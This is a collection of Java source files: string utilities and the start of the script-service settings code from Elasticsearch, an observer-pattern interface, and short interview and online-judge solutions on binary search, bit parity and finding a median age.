final String token = tokenizer.nextToken().trim();
if (token.length() > 0) {
tokens.add(token);
}
}
return tokens;
}
/**
* Take a String which is a delimited list and convert it to a String array.
* <p>A single delimiter may consist of more than one character: it will still
* be considered a single delimiter string, rather than a bunch of potential
* delimiter characters - in contrast to <code>tokenizeToStringArray</code>.
*
* @param str the input String
* @param delimiter the delimiter between elements (this is a single delimiter,
* rather than a bunch of individual delimiter characters)
* @return an array of the tokens in the list
* @see #tokenizeToStringArray
*/
public static String[] delimitedListToStringArray(String str, String delimiter) {
return delimitedListToStringArray(str, delimiter, null);
}
/**
* Take a String which is a delimited list and convert it to a String array.
* <p>A single delimiter may consist of more than one character: it will still
* be considered a single delimiter string, rather than a bunch of potential
* delimiter characters - in contrast to <code>tokenizeToStringArray</code>.
*
* @param str the input String
* @param delimiter the delimiter between elements (this is a single delimiter,
* rather than a bunch of individual delimiter characters)
* @param charsToDelete a set of characters to delete. Useful for deleting unwanted
* line breaks: e.g. "\r\n\f" will delete all new lines and line feeds in a String.
* @return an array of the tokens in the list
* @see #tokenizeToStringArray
*/
public static String[] delimitedListToStringArray(String str, String delimiter, String charsToDelete) {
if (str == null) {
return EMPTY_ARRAY;
}
if (delimiter == null) {
return new String[] { str };
}
List<String> result;
if (delimiter.isEmpty()) {
// split on every character
result = new ArrayList<>(str.length());
if (charsToDelete == null) {
charsToDelete = "";
}
for (int i = 0; i < str.length(); i++) {
if (charsToDelete.indexOf(str.charAt(i)) == -1) {
result.add(Character.toString(str.charAt(i)));
} else {
result.add("");
}
}
} else {
result = new ArrayList<>();
int pos = 0;
int delPos;
while ((delPos = str.indexOf(delimiter, pos)) != -1) {
result.add(deleteAny(str.subSequence(pos, delPos), charsToDelete).toString());
pos = delPos + delimiter.length();
}
if (str.length() > 0 && pos <= str.length()) {
// Add rest of String, but not in case of empty input.
result.add(deleteAny(str.subSequence(pos, str.length()), charsToDelete).toString());
}
}
return toStringArray(result);
}
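/*
 * Illustrative comparison (editor-added sketch, not part of the original class) of the two
 * splitting styles documented above:
 *
 *   Strings.tokenizeToStringArray("a, b,, c", ",");      // ["a", "b", "c"]       (trims, skips empty tokens)
 *   Strings.delimitedListToStringArray("a, b,, c", ","); // ["a", " b", "", " c"] (keeps everything verbatim)
 */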
/**
* Convert a CSV list into an array of Strings.
*
* @param str the input String
* @return an array of Strings, or the empty array in case of empty input
*/
public static String[] commaDelimitedListToStringArray(String str) {
return delimitedListToStringArray(str, ",");
}
/**
* Convenience method to convert a CSV string list to a set.
* Note that this will suppress duplicates.
*
* @param str the input String
* @return a Set of String entries in the list
*/
public static Set<String> commaDelimitedListToSet(String str) {
String[] tokens = commaDelimitedListToStringArray(str);
return new TreeSet<>(Arrays.asList(tokens));
}
/**
* Convenience method to return a Collection as a delimited (e.g. CSV)
* String. E.g. useful for <code>toString()</code> implementations.
*
* @param coll the Collection to display
* @param delim the delimiter to use (probably a ",")
* @param prefix the String to start each element with
* @param suffix the String to end each element with
* @return the delimited String
*/
public static String collectionToDelimitedString(Iterable<?> coll, String delim, String prefix, String suffix) {
StringBuilder sb = new StringBuilder();
collectionToDelimitedString(coll, delim, prefix, suffix, sb);
return sb.toString();
}
public static void collectionToDelimitedString(Iterable<?> coll, String delim, String prefix, String suffix, StringBuilder sb) {
Iterator<?> it = coll.iterator();
while (it.hasNext()) {
sb.append(prefix).append(it.next()).append(suffix);
if (it.hasNext()) {
sb.append(delim);
}
}
}
/**
* Converts a collection of items to a string like {@link #collectionToDelimitedString(Iterable, String, String, String, StringBuilder)}
* except that it stops if the string gets too long and just indicates how many items were omitted.
*
* @param coll the collection of items to display
* @param delim the delimiter to write between the items (usually {@code ","})
* @param prefix a string to write before each item (usually {@code ""} or {@code "["})
* @param suffix a string to write after each item (usually {@code ""} or {@code "]"})
* @param appendLimit if this many characters have been appended to the string and there are still items to display then the remaining
* items are omitted
*/
public static void collectionToDelimitedStringWithLimit(
Iterable<?> coll,
String delim,
String prefix,
String suffix,
int appendLimit,
StringBuilder sb
) {
final Iterator<?> it = coll.iterator();
final long lengthLimit = sb.length() + appendLimit; // long to avoid overflow
int count = 0;
while (it.hasNext()) {
sb.append(prefix).append(it.next()).append(suffix);
count += 1;
if (it.hasNext()) {
sb.append(delim);
if (sb.length() > lengthLimit) {
int omitted = 0;
while (it.hasNext()) {
it.next();
omitted += 1;
}
sb.append("... (").append(count + omitted).append(" in total, ").append(omitted).append(" omitted)");
}
}
}
}
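/*
 * Illustrative usage (editor-added sketch, not part of the original class): with a small
 * appendLimit the tail of a long collection is summarised instead of printed in full.
 *
 *   StringBuilder sb = new StringBuilder();
 *   Strings.collectionToDelimitedStringWithLimit(List.of("a", "b", "c", "d", "e"), ",", "", "", 3, sb);
 *   // sb.toString() -> "a,b,... (5 in total, 3 omitted)"
 */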
/**
* Convenience method to return a Collection as a delimited (e.g. CSV)
* String. E.g. useful for <code>toString()</code> implementations.
*
* @param coll the Collection to display
* @param delim the delimiter to use (probably a ",")
* @return the delimited String
*/
public static String collectionToDelimitedString(Iterable<?> coll, String delim) {
return collectionToDelimitedString(coll, delim, "", "");
}
/**
* Convenience method to return a Collection as a CSV String.
* E.g. useful for <code>toString()</code> implementations.
*
* @param coll the Collection to display
* @return the delimited String
*/
public static String collectionToCommaDelimitedString(Iterable<?> coll) {
return collectionToDelimitedString(coll, ",");
}
/**
* Convenience method to return a String array as a delimited (e.g. CSV)
* String. E.g. useful for <code>toString()</code> implementations.
*
* @param arr the array to display
* @param delim the delimiter to use (probably a ",")
* @return the delimited String
*/
public static String arrayToDelimitedString(Object[] arr, String delim) {
StringBuilder sb = new StringBuilder();
arrayToDelimitedString(arr, delim, sb);
return sb.toString();
}
public static void arrayToDelimitedString(Object[] arr, String delim, StringBuilder sb) {
if (isEmpty(arr)) {
return;
}
for (int i = 0; i < arr.length; i++) {
if (i > 0) {
sb.append(delim);
}
sb.append(arr[i]);
}
}
/**
* Convenience method to return a String array as a CSV String.
* E.g. useful for <code>toString()</code> implementations.
*
* @param arr the array to display
* @return the delimited String
*/
public static String arrayToCommaDelimitedString(Object[] arr) {
return arrayToDelimitedString(arr, ",");
}
/**
* Format the double value with a single decimal point, trimming a trailing '.0'.
*/
public static String format1Decimals(double value, String suffix) {
String p = String.valueOf(value);
int ix = p.indexOf('.') + 1;
int ex = p.indexOf('E');
char fraction = p.charAt(ix);
if (fraction == '0') {
if (ex != -1) {
return p.substring(0, ix - 1) + p.substring(ex) + suffix;
} else {
return p.substring(0, ix - 1) + suffix;
}
} else {
if (ex != -1) {
return p.substring(0, ix) + fraction + p.substring(ex) + suffix;
} else {
return p.substring(0, ix) + fraction + suffix;
}
}
}
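/*
 * Illustrative usage (editor-added sketch, not part of the original class):
 *
 *   Strings.format1Decimals(3.0, "kb");    // "3kb"   (trailing ".0" trimmed)
 *   Strings.format1Decimals(3.25, "kb");   // "3.2kb" (only the first fractional digit is kept)
 */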
/**
* Determine whether the given array is empty:
* i.e. <code>null</code> or of zero length.
*
* @param array the array to check
*/
private static boolean isEmpty(Object[] array) {
return (array == null || array.length == 0);
}
private Strings() {}
public static byte[] toUTF8Bytes(CharSequence charSequence) {
return toUTF8Bytes(charSequence, new BytesRefBuilder());
}
public static byte[] toUTF8Bytes(CharSequence charSequence, BytesRefBuilder spare) {
spare.copyChars(charSequence);
return Arrays.copyOf(spare.bytes(), spare.length());
}
/**
* Return substring(beginIndex, endIndex), tolerating an endIndex beyond the end of the string by clamping it to the string length.
*/
public static String substring(String s, int beginIndex, int endIndex) {
if (s == null) {
return s;
}
int realEndIndex = s.length() > 0 ? s.length() - 1 : 0;
if (endIndex > realEndIndex) {
return s.substring(beginIndex);
} else {
return s.substring(beginIndex, endIndex);
}
}
/**
* Returns <code>true</code> if the array is empty, or if its only element is "*" or "_all",
* which is conventionally used to mean "everything".
*/
public static boolean isAllOrWildcard(String[] data) {
return CollectionUtils.isEmpty(data) || data.length == 1 && isAllOrWildcard(data[0]);
}
/**
* Returns `true` if the string is `_all` or `*`.
*/
public static boolean isAllOrWildcard(String data) {
return "_all".equals(data) || "*".equals(data);
}
/**
* Return a {@link String} that is the json representation of the provided {@link ToXContent}.
* Wraps the output into an anonymous object if needed. The content is not pretty-printed
* nor human readable.
*/
public static String toString(ToXContent toXContent) {
return toString(toXContent, false, false);
}
/**
* Return a {@link String} that is the json representation of the provided {@link ChunkedToXContent}.
* @deprecated don't add usages of this method, it will be removed eventually
* TODO: remove this method, it makes no sense to turn potentially very large chunked xcontent instances into a string
*/
@Deprecated
public static String toString(ChunkedToXContent chunkedToXContent) {
return toString(chunkedToXContent, false, false);
}
/**
* Return a {@link String} that is the json representation of the provided {@link ToXContent}.
* Wraps the output into an anonymous object if needed.
* Allows to configure the params.
* The content is not pretty-printed nor human readable.
*/
public static String toString(ToXContent toXContent, ToXContent.Params params) {
return toString(toXContent, params, false, false);
}
/**
* Returns a string representation of the builder (only applicable for text based xcontent).
* @param xContentBuilder builder containing an object to converted to a string
*/
public static String toString(XContentBuilder xContentBuilder) {
return BytesReference.bytes(xContentBuilder).utf8ToString();
}
/**
* Return a {@link String} that is the json representation of the provided {@link ToXContent}.
* Wraps the output into an anonymous object if needed. Allows to control whether the outputted
* json needs to be pretty printed and human readable.
*
*/
public static String toString(ToXContent toXContent, boolean pretty, boolean human) {
return toString(toXContent, ToXContent.EMPTY_PARAMS, pretty, human);
}
/**
* Return a {@link String} that is the json representation of the provided {@link ChunkedToXContent}.
* Allows to control whether the outputted json needs to be pretty printed and human readable.
* @deprecated don't add usages of this method, it will be removed eventually
* TODO: remove this method, it makes no sense to turn potentially very large chunked xcontent instances into a string
*/
@Deprecated
public static String toString(ChunkedToXContent chunkedToXContent, boolean pretty, boolean human) {
return toString(ChunkedToXContent.wrapAsToXContent(chunkedToXContent), pretty, human);
}
/**
* Return a {@link String} that is the json representation of the provided {@link ToXContent}.
* Wraps the output into an anonymous object if needed.
* Allows to configure the params.
* Allows to control whether the outputted json needs to be pretty printed and human readable.
*/
private static String toString(ToXContent toXContent, ToXContent.Params params, boolean pretty, boolean human) {
try {
XContentBuilder builder = createBuilder(pretty, human);
if (toXContent.isFragment()) {
builder.startObject();
}
toXContent.toXContent(builder, params);
if (toXContent.isFragment()) {
builder.endObject();
}
return toString(builder);
} catch (IOException e) {
try {
XContentBuilder builder = createBuilder(pretty, human);
builder.startObject();
builder.field("error", "error building toString out of XContent: " + e.getMessage());
builder.field("stack_trace", ExceptionsHelper.stackTrace(e));
builder.endObject();
return toString(builder);
} catch (IOException e2) {
throw new ElasticsearchException("cannot generate error message for deserialization", e);
}
}
}
private static XContentBuilder createBuilder(boolean pretty, boolean human) throws IOException {
XContentBuilder builder = JsonXContent.contentBuilder();
if (pretty) {
builder.prettyPrint();
}
if (human) {
builder.humanReadable(true);
}
return builder;
}
/**
* Truncates the string so that its length does not exceed {@code length}. Backtracks to avoid
* splitting a surrogate pair, dropping a trailing high surrogate if necessary.
*/
public static String cleanTruncate(String s, int length) {
if (s == null) {
return s;
}
/*
* It's pretty silly to truncate to 0 length, but just in case
* someone does, this shouldn't break.
*/
if (length == 0) {
return "";
}
if (length >= s.length()) {
return s;
}
if (Character.isHighSurrogate(s.charAt(length - 1))) {
length--;
}
return s.substring(0, length);
}
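/*
 * Illustrative usage (editor-added sketch, not part of the original class): truncating in the
 * middle of a surrogate pair backs off by one char so the result stays valid UTF-16.
 *
 *   String s = "ab" + new String(Character.toChars(0x1F600)); // "ab" plus one emoji (a surrogate pair)
 *   Strings.cleanTruncate(s, 3);   // "ab" - the lone high surrogate is dropped
 *   Strings.cleanTruncate(s, 4);   // the full string, emoji included
 */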
/**
* Checks that the supplied string is neither null nor empty, per {@link #isNullOrEmpty(String)}.
* If this check fails, then an {@link IllegalArgumentException} is thrown with the supplied message.
*
* @param str the <code>String</code> to check
* @param message the exception message to use if {@code str} is null or empty
* @return the supplied {@code str}
*/
public static String requireNonEmpty(String str, String message) {
if (isNullOrEmpty(str)) {
throw new IllegalArgumentException(message);
}
return str;
}
/**
* Checks that the supplied string is neither null nor blank, per {@link #isNullOrBlank(String)}.
* If this check fails, then an {@link IllegalArgumentException} is thrown with the supplied message.
*
* @param str the <code>String</code> to check
* @param message the exception message to use if {@code str} is null or blank
* @return the supplied {@code str}
*/
public static String requireNonBlank(String str, String message) {
if (isNullOrBlank(str)) {
throw new IllegalArgumentException(message);
}
return str;
}
public static boolean isNullOrEmpty(@Nullable String s) {
return s == null || s.isEmpty();
}
public static boolean isNullOrBlank(@Nullable String s) {
return s == null || s.isBlank();
}
public static String padStart(String s, int minimumLength, char c) {
Objects.requireNonNull(s, "s");
if (s.length() >= minimumLength) {
return s;
} else {
return Character.toString(c).repeat(minimumLength - s.length()) + s;
}
}
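/*
 * Illustrative usage (editor-added sketch, not part of the original class):
 *
 *   Strings.padStart("7", 3, '0');    // "007"
 *   Strings.padStart("1234", 3, '0'); // "1234" (already long enough, returned as-is)
 */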
public static String toLowercaseAscii(String in) {
return in.codePoints()
.map(cp -> cp <= 128 ? Character.toLowerCase(cp) : cp)
.collect(StringBuilder::new, StringBuilder::appendCodePoint, StringBuilder::append)
.toString();
}
/**
* Alias for {@link org.elasticsearch.core.Strings#format}
*/
public static String format(String format, Object... args) {
return org.elasticsearch.core.Strings.format(format, args);
}
public static String stripDisallowedChars(String string) {
return INVALID_FILENAME_CHARS_REGEX.matcher(string).replaceAll("");
}
}
| elastic/elasticsearch | server/src/main/java/org/elasticsearch/common/Strings.java |
1,142 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.observer;
/**
* Observer interface.
*/
public interface WeatherObserver {
void update(WeatherType currentWeather);
}
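// Illustrative sketch (not part of the original sample): a minimal concrete observer, assuming
// WeatherType is the enum defined elsewhere in this package. It simply reacts to each notification
// pushed by the subject by logging the new weather. The class name is only for illustration.
class WeatherLogger implements WeatherObserver {

  @Override
  public void update(WeatherType currentWeather) {
    // react to the state change announced by the subject
    System.out.println("Weather changed to: " + currentWeather);
  }
}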
| smedals/java-design-patterns | observer/src/main/java/com/iluwatar/observer/WeatherObserver.java |
1,143 | // We are playing the Guess Game. The game is as follows:
// I pick a number from 1 to n. You have to guess which number I picked.
// Every time you guess wrong, I'll tell you whether the number is higher or lower.
// You call a pre-defined API guess(int num) which returns 3 possible results (-1, 1, or 0):
// -1 : My number is lower
// 1 : My number is higher
// 0 : Congrats! You got it!
// Example:
// n = 10, I pick 6.
// Return 6.
/* The guess API is defined in the parent class GuessGame.
@param num, your guess
@return -1 if my number is lower, 1 if my number is higher, otherwise return 0
int guess(int num); */
public class GuessNumberHigherOrLower extends GuessGame {
public int guessNumber(int n) {
int left = 1;
int right = n;
        while(left <= right) {
            int mid = left + (right - left) / 2;
            //call the guess API once per iteration and reuse the result
            int result = guess(mid);
            if(result == 0) {
                return mid;
            } else if(result > 0) {
                //the picked number is higher than mid, discard mid and the lower half
                left = mid + 1;
            } else {
                //the picked number is lower than mid, discard mid and the upper half
                right = mid - 1;
            }
}
return -1;
}
}
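// Worked example (using the sample above, n = 10 and picked number 6), assuming the search loop as
// written here: mid = 5 -> guess says higher -> left = 6; mid = 8 -> guess says lower -> right = 7;
// mid = 6 -> guess returns 0 and 6 is returned. Each step halves the range, so the API is called
// O(log n) times.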
| kdn251/interviews | company/google/GuessNumberHigherOrLower.java |
1,144 | /**
* We define the parity of an integer n as the sum of the bits in binary representation computed modulo
 * two. As an example, the number 21 = 10101 (base 2) has three 1s in its binary representation so it has parity
 * 3 (mod 2), or 1.
* In this problem you have to calculate the parity of an integer 1 ≤ I ≤ 2147483647.
* Input
* Each line of the input has an integer I and the end of the input is indicated by a line where I = 0 that
* should not be processed.
* Output
 * For each integer I in the input you should print a line ‘The parity of B is P (mod 2).’, where B
* is the binary representation of I.
* Sample Input
* 1
* 2
* 10
* 21
* 0
* Sample Output
* The parity of 1 is 1 (mod 2).
* The parity of 10 is 1 (mod 2).
* The parity of 1010 is 2 (mod 2).
* The parity of 10101 is 3 (mod 2).
*/
//https://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_problem&problem=1872
import java.util.Scanner;
public class Parity {
    public static void main(String[] args) {
        //create the scanner once; re-creating it over System.in inside the loop can lose buffered input
        Scanner input = new Scanner(System.in);
        while (true) {
            int number = input.nextInt();
            if (number == 0) {
                break;
            }
            String binaryInString = convertToBinary(number);
            //count the 1-bits in the binary representation
            int count = 0;
            for (int i = 0; i < binaryInString.length(); i++) {
                if (binaryInString.charAt(i) == '1') {
                    count++;
                }
            }
            System.out.println("The parity of " + binaryInString + " is "
                    + count + " (mod 2).");
        }
    }
private static String convertToBinary(int number) {
StringBuilder s = new StringBuilder("");
while (number != 0) {
s = s.append(number % 2);
number = number / 2;
}
return s.reverse().toString();
}
}
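// A minimal alternative sketch (not part of the original submission): the JDK already provides both
// the binary conversion and the bit count, so the same output can be produced with
// Integer.toBinaryString and Integer.bitCount. The class name is only for illustration.
class ParityBuiltins {
    public static void main(String[] args) {
        java.util.Scanner in = new java.util.Scanner(System.in);
        while (true) {
            int number = in.nextInt();
            if (number == 0) {
                break;
            }
            System.out.println("The parity of " + Integer.toBinaryString(number)
                    + " is " + Integer.bitCount(number) + " (mod 2).");
        }
    }
}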
| kdn251/interviews | uva/Parity.java |
1,147 | /**
* There is a village in Bangladesh, where brick game is very popular. Brick game is a team game. Each
* team consists of odd number of players. Number of players must be greater than 1 but cannot be
* greater than 10. Age of each player must be within 11 and 20. No two players can have the same age.
* There is a captain for each team. The communication gap between two players depends on their age
* difference, i.e. the communication gap is larger if the age difference is larger. Hence they select the
* captain of a team in such a way so that the number of players in the team who are younger than that
* captain is equal to the number of players who are older than that captain.
* Ages of all members of the team are provided. You have to determine the age of the captain.
* Input
* Input starts with an integer T (T ≤ 100), the number of test cases.
* Each of the next T lines will start with an integer N (1 < N < 11), number of team members
* followed by N space separated integers representing ages of all of the members of a team. Each of these
* N integers will be between 11 and 20 (inclusive). Note that, ages will be given in strictly increasing
* order or strictly decreasing order. We will not mention which one is increasing and which one is
* decreasing, you have to be careful enough to handle both situations.
* Output
* For each test case, output one line in the format ‘Case x: a’ (quotes for clarity), where x is the case
* number and a is the age of the captain.
* Sample Input
* 2
* 5 19 17 16 14 12
* 5 12 14 16 17 18
* Sample Output
* Case 1: 16
* Case 2: 16
*/
//https://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_problem&problem=2986
import static java.lang.Integer.parseInt;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.Scanner;
public class BrickGame {
    public static void main(String[] args) {
        Scanner input = new Scanner(System.in);
        int numberOfTestCases = input.nextInt();
        //consume the rest of the first line so each later nextLine() reads a full team line
        input.nextLine();
        int caseNum = 1;
        while (numberOfTestCases != 0) {
            String[] numbersString = input.nextLine().trim().split("\\s+");
            int numberOfMembers = parseInt(numbersString[0]);
            List<Integer> numbers = new ArrayList<Integer>();
            //the list holds the member count followed by the ages
            for (int i = 0; i < numberOfMembers + 1; i++) {
                numbers.add(parseInt(numbersString[i]));
            }
            //after sorting, the count (at most 10) is smaller than every age (at least 11), so
            //dropping the first element leaves the sorted ages and the middle one is the captain
            Collections.sort(numbers);
            System.out.print("Case "
                    + caseNum
                    + ": "
                    + numbers.subList(1, numbers.size()).get(
                            numberOfMembers / 2) + "\n");
            numberOfTestCases--;
            caseNum++;
        }
    }
}
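// A minimal alternative sketch (not part of the original submission): because each team has an odd
// number of players and the ages arrive already sorted (strictly increasing or strictly decreasing),
// the captain's age is simply the middle value of the line as given, so no sorting is needed.
// The class name is only for illustration.
class BrickGameMiddle {
    public static void main(String[] args) {
        java.util.Scanner in = new java.util.Scanner(System.in);
        int testCases = in.nextInt();
        for (int caseNum = 1; caseNum <= testCases; caseNum++) {
            int n = in.nextInt();
            int[] ages = new int[n];
            for (int i = 0; i < n; i++) {
                ages[i] = in.nextInt();
            }
            System.out.println("Case " + caseNum + ": " + ages[n / 2]);
        }
    }
}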
| kdn251/interviews | uva/BrickGame.java |
1,155 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.script;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.elasticsearch.ResourceNotFoundException;
import org.elasticsearch.action.ActionListener;
import org.elasticsearch.action.admin.cluster.storedscripts.DeleteStoredScriptRequest;
import org.elasticsearch.action.admin.cluster.storedscripts.GetStoredScriptRequest;
import org.elasticsearch.action.admin.cluster.storedscripts.PutStoredScriptRequest;
import org.elasticsearch.action.support.master.AcknowledgedResponse;
import org.elasticsearch.cluster.AckedClusterStateUpdateTask;
import org.elasticsearch.cluster.ClusterChangedEvent;
import org.elasticsearch.cluster.ClusterState;
import org.elasticsearch.cluster.ClusterStateApplier;
import org.elasticsearch.cluster.ClusterStateUpdateTask;
import org.elasticsearch.cluster.metadata.Metadata;
import org.elasticsearch.cluster.service.ClusterService;
import org.elasticsearch.common.Strings;
import org.elasticsearch.common.logging.DeprecationCategory;
import org.elasticsearch.common.logging.DeprecationLogger;
import org.elasticsearch.common.settings.ClusterSettings;
import org.elasticsearch.common.settings.Setting;
import org.elasticsearch.common.settings.Setting.Property;
import org.elasticsearch.common.settings.Settings;
import org.elasticsearch.common.util.Maps;
import org.elasticsearch.common.util.set.Sets;
import org.elasticsearch.core.IOUtils;
import org.elasticsearch.core.SuppressForbidden;
import org.elasticsearch.core.TimeValue;
import java.io.Closeable;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.Comparator;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Objects;
import java.util.Set;
import java.util.concurrent.atomic.AtomicReference;
import java.util.function.LongSupplier;
import java.util.stream.Collectors;
public class ScriptService implements Closeable, ClusterStateApplier, ScriptCompiler {
private static final Logger logger = LogManager.getLogger(ScriptService.class);
private static final DeprecationLogger deprecationLogger = DeprecationLogger.getLogger(ScriptService.class);
static final String DISABLE_DYNAMIC_SCRIPTING_SETTING = "script.disable_dynamic";
// Special setting value for SCRIPT_GENERAL_MAX_COMPILATIONS_RATE to indicate the script service should use context
// specific caches
static final ScriptCache.CompilationRate USE_CONTEXT_RATE_VALUE = new ScriptCache.CompilationRate(-1, TimeValue.MINUS_ONE);
static final String USE_CONTEXT_RATE_KEY = "use-context";
public static final Setting<Integer> SCRIPT_GENERAL_CACHE_SIZE_SETTING = Setting.intSetting(
"script.cache.max_size",
3000,
0,
Property.Dynamic,
Property.NodeScope
);
public static final Setting<TimeValue> SCRIPT_GENERAL_CACHE_EXPIRE_SETTING = Setting.positiveTimeSetting(
"script.cache.expire",
TimeValue.timeValueMillis(0),
Property.Dynamic,
Property.NodeScope
);
public static final Setting<Integer> SCRIPT_MAX_SIZE_IN_BYTES = Setting.intSetting(
"script.max_size_in_bytes",
65535,
0,
Property.Dynamic,
Property.NodeScope
);
public static final Setting<ScriptCache.CompilationRate> SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING = new Setting<>(
"script.max_compilations_rate",
"150/5m",
(String value) -> value.equals(USE_CONTEXT_RATE_KEY) ? USE_CONTEXT_RATE_VALUE : new ScriptCache.CompilationRate(value),
Property.Dynamic,
Property.NodeScope
);
public static final String USE_CONTEXT_RATE_KEY_DEPRECATION_MESSAGE = "["
+ USE_CONTEXT_RATE_KEY
+ "] is deprecated for the setting ["
+ SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.getKey()
+ "] as system scripts are now exempt from the rate limit. "
+ "Set to a value such as [150/5m] (a rate of 150 compilations per five minutes) to rate limit user scripts in case the "
+ "script cache ["
+ SCRIPT_GENERAL_CACHE_SIZE_SETTING.getKey()
+ "] is undersized causing script compilation thrashing.";
// Per-context settings
static final String CONTEXT_PREFIX = "script.context.";
// script.context.<context-name>.{cache_max_size, cache_expire, max_compilations_rate}
public static final Setting.AffixSetting<Integer> SCRIPT_CACHE_SIZE_SETTING = Setting.affixKeySetting(
CONTEXT_PREFIX,
"cache_max_size",
key -> Setting.intSetting(
key,
SCRIPT_GENERAL_CACHE_SIZE_SETTING,
0,
Property.NodeScope,
Property.Dynamic,
Property.DeprecatedWarning
)
);
public static final Setting.AffixSetting<TimeValue> SCRIPT_CACHE_EXPIRE_SETTING = Setting.affixKeySetting(
CONTEXT_PREFIX,
"cache_expire",
key -> Setting.positiveTimeSetting(
key,
SCRIPT_GENERAL_CACHE_EXPIRE_SETTING,
TimeValue.timeValueMillis(0),
Property.NodeScope,
Property.Dynamic,
Property.DeprecatedWarning
)
);
// Unlimited compilation rate for context-specific script caches
static final String UNLIMITED_COMPILATION_RATE_KEY = "unlimited";
public static final Setting.AffixSetting<ScriptCache.CompilationRate> SCRIPT_MAX_COMPILATIONS_RATE_SETTING = Setting.affixKeySetting(
CONTEXT_PREFIX,
"max_compilations_rate",
key -> new Setting<ScriptCache.CompilationRate>(
key,
"75/5m",
(String value) -> value.equals(UNLIMITED_COMPILATION_RATE_KEY)
? ScriptCache.UNLIMITED_COMPILATION_RATE
: new ScriptCache.CompilationRate(value),
Property.NodeScope,
Property.Dynamic,
Property.DeprecatedWarning
)
);
private static final ScriptCache.CompilationRate SCRIPT_COMPILATION_RATE_ZERO = new ScriptCache.CompilationRate(0, TimeValue.ZERO);
public static final Setting<Boolean> SCRIPT_DISABLE_MAX_COMPILATIONS_RATE_SETTING = Setting.boolSetting(
"script.disable_max_compilations_rate",
false,
Property.NodeScope
);
public static final String ALLOW_NONE = "none";
public static final Setting<List<String>> TYPES_ALLOWED_SETTING = Setting.stringListSetting(
"script.allowed_types",
Setting.Property.NodeScope
);
public static final Setting<List<String>> CONTEXTS_ALLOWED_SETTING = Setting.stringListSetting(
"script.allowed_contexts",
Setting.Property.NodeScope
);
private final Set<String> typesAllowed;
private final Set<String> contextsAllowed;
private final Map<String, ScriptEngine> engines;
private final Map<String, ScriptContext<?>> contexts;
private final LongSupplier timeProvider;
private ClusterState clusterState;
private int maxSizeInBytes;
// package private for tests
final AtomicReference<CacheHolder> cacheHolder = new AtomicReference<>();
@SuppressWarnings("this-escape")
public ScriptService(
Settings settings,
Map<String, ScriptEngine> engines,
Map<String, ScriptContext<?>> contexts,
LongSupplier timeProvider
) {
this.engines = Collections.unmodifiableMap(Objects.requireNonNull(engines));
this.contexts = Collections.unmodifiableMap(Objects.requireNonNull(contexts));
if (Strings.hasLength(settings.get(DISABLE_DYNAMIC_SCRIPTING_SETTING))) {
throw new IllegalArgumentException(
DISABLE_DYNAMIC_SCRIPTING_SETTING
+ " is not a supported setting, replace with "
+ "fine-grained script settings. \n Dynamic scripts can be enabled for all languages and all operations not "
+ "using `script.disable_dynamic: false` in elasticsearch.yml"
);
}
this.typesAllowed = TYPES_ALLOWED_SETTING.exists(settings) ? new HashSet<>() : null;
if (this.typesAllowed != null) {
List<String> typesAllowedList = TYPES_ALLOWED_SETTING.get(settings);
if (typesAllowedList.isEmpty()) {
throw new IllegalArgumentException(
"must specify at least one script type or none for setting [" + TYPES_ALLOWED_SETTING.getKey() + "]."
);
}
for (String settingType : typesAllowedList) {
if (ALLOW_NONE.equals(settingType)) {
if (typesAllowedList.size() != 1) {
throw new IllegalArgumentException(
"cannot specify both ["
+ ALLOW_NONE
+ "]"
+ " and other script types for setting ["
+ TYPES_ALLOWED_SETTING.getKey()
+ "]."
);
} else {
break;
}
}
boolean found = false;
for (ScriptType scriptType : ScriptType.values()) {
if (scriptType.getName().equals(settingType)) {
found = true;
this.typesAllowed.add(settingType);
break;
}
}
if (found == false) {
throw new IllegalArgumentException(
"unknown script type [" + settingType + "] found in setting [" + TYPES_ALLOWED_SETTING.getKey() + "]."
);
}
}
}
this.contextsAllowed = CONTEXTS_ALLOWED_SETTING.exists(settings) ? new HashSet<>() : null;
if (this.contextsAllowed != null) {
List<String> contextsAllowedList = CONTEXTS_ALLOWED_SETTING.get(settings);
if (contextsAllowedList.isEmpty()) {
throw new IllegalArgumentException(
"must specify at least one script context or none for setting [" + CONTEXTS_ALLOWED_SETTING.getKey() + "]."
);
}
for (String settingContext : contextsAllowedList) {
if (ALLOW_NONE.equals(settingContext)) {
if (contextsAllowedList.size() != 1) {
throw new IllegalArgumentException(
"cannot specify both ["
+ ALLOW_NONE
+ "]"
+ " and other script contexts for setting ["
+ CONTEXTS_ALLOWED_SETTING.getKey()
+ "]."
);
} else {
break;
}
